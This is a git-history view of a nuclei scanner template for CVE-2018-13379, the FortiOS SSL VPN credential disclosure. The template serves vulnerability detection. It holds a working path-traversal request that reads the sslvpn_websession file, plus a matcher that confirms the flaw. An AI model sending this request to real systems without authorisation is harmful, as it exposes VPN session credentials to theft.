nuclei-templates/cves/CVE-2018-13379.yaml

16 lines
312 B
YAML
Raw Normal View History

id: cve-2018-13379
2020-04-22 06:42:01 +00:00
info:
2020-06-22 13:35:37 +00:00
name: FortiOS - Credentials Disclosure
2020-04-22 06:42:01 +00:00
author: organiccrap
severity: high
requests:
- method: GET
2020-05-25 07:49:06 +00:00
path:
2020-04-22 06:42:01 +00:00
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
matchers:
- type: word
2020-05-25 07:49:06 +00:00
words:
2020-04-22 06:42:01 +00:00
- "var fgt_lang ="